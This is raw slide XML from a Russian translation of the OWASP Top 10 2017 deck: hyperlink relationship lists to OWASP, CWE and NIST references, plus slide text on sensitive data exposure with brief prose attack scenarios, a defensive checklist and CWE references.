TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External"/><Relationship Id="rId2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Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External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6.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="Externa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-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html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s://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="Externa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Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NE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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASV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Chapter" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId32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slide" Target="slide5.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xm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s://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId35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9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diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Security_Guide_For_CISOs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s://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId9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slide" Target="slide13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology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601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/451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hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799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WASP/Top10/tree/master/2017/datacall" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23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slide" Target="slide12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slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissio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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk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19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Projec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Testing_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls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owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASV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notesSlide" Target="../notesSlides/notesSlide4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15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF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hreat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator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cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm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slide" Target="slide22.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/ru/isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/ru/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=4916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esting_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html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we.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection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owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaw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Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords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https://www.owasp.org/index.php/OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html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we.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_stuffing" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_App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858000" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8327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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWAS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3260464" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="cc.logo.large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00" y="8532000"/>
            <a:ext cx="1081144" cy="257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18288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0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Топ-10 OWASP — 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Десять самых опасных уязвимостей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>веб-приложений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5032" y="8636913"/>
            <a:ext cx="438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Данная работа выпущена под лицензией </a:t>
            </a:r>
            <a:b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Creative Commons Attribution-ShareAlike 4.0 International License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0"/>
            <a:ext cx="4876397" cy="32488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8758980"/>
            <a:ext cx="163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https://owasp.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232377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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="72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шифрует номера кредитных карт в базе данных, используя автоматическое шифрование БД. Однако эти данные автоматически расшифровываются при извлечении, позволяя с помощью внедрения SQL-кода получить данные кредитных карт в незашифрованном виде. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="72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Сайт не использует TLS для всех страниц или поддерживает ненадежное шифрование. Злоумышленник может просмотреть сетевой трафик (например, в небезопасной беспроводной сети), переключить соединение с HTTPS на HTTP, перехватить запросы и похитить сессионные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После этого он может использовать полученные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перехвата сессии пользователя (прошедшего аутентификацию), изменив личные данные пользователя. Также злоумышленник может изменить все передаваемые данные, например получателя денежного перевода.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="72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№3: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сохранения паролей в базе данных не используется соль или используется простой алгоритм хеширования. Уязвимость в загрузке файлов позволяет злоумышленнику получить БД паролей. Все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-значения без соли могут быть восстановлены с помощью радужной таблицы предварительно рассчитанных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хешей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-значения, рассчитанные с использованием простых или быстрых хеш-функций, могут быть взломаны с помощью графических процессоров, даже если для них использовалась соль.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Прежде всего необходимо определить требуемый уровень защиты данных при их передаче и хранении. Например, пароли, номера кредитных карт, медицинские записи, персональные данные и коммерческие тайны требуют дополнительной защиты, особенно если они подпадают под действие закона о неприкосновенности данных (напр., Общего регламента ЕС по защите данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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(GDPR)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или закона о защите финансовых данных (напр., Стандарта безопасности данных в сфере платежных карт (PCI DSS)).</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="7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Шифруются ли передаваемые данные? Это касается протоколов передачи данных, таких как HTTP, SMTP и FTP. Особенно опасен внешний интернет-трафик. Проверьте весь внутренний трафик, например между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балансировщиками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нагрузки, веб-серверами и внутренними системами.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Шифруются ли хранилища важных данных, а также резервные копии?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ли по умолчанию или в более ранних версиях устаревшие или ненадежные алгоритмы шифрования? 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ли созданные по умолчанию, ненадежные или одинаковые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шифроключи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а также применяются ли соответствующие механизмы контроля и смены ключей?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Используется ли шифрование, например присутствуют ли директивы безопасности пользовательских агентов (браузеров) и заголовки?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Проверяет ли пользовательский агент (напр., приложение или почтовый клиент) действительность полученных сертификатов?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См. Стандарт подтверждения безопасности приложений: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Криптография (V7)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Защита данных (V9)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SSL/TLS (V10).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Проактивная</a:t>
            </a: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защита OWASP: Защита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Стандарт подтверждения безопасности приложений OWASP (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V7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9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10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Памятка OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="700" dirty="0"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: </a:t>
            </a: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Защита транспортного уровня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Защита конфиденциальности пользователей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Памятка OWASP: Хранение паролей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хранение в зашифрованном виде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Проект OWASP: Безопасные заголовки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Памятка по HSTS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Руководство OWASP по тестированию: Проверка надежности шифрования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9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CWE-202: Разглашение конфиденциальных данных, связанное с запросами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CWE-310: Уязвимости, связанные с криптографией</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="6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ru-RU" sz="6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CWE-311: Отсутствие шифрования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CWE-312: Хранение критичных данных в незашифрованном виде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CWE-319: Передача критичных данных в незашифрованном виде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CWE-326: Ненадежное шифрование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="6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CWE-327: Скомпрометированный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="650" u="sng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криптоалгоритм</a:t>
            </a:r>
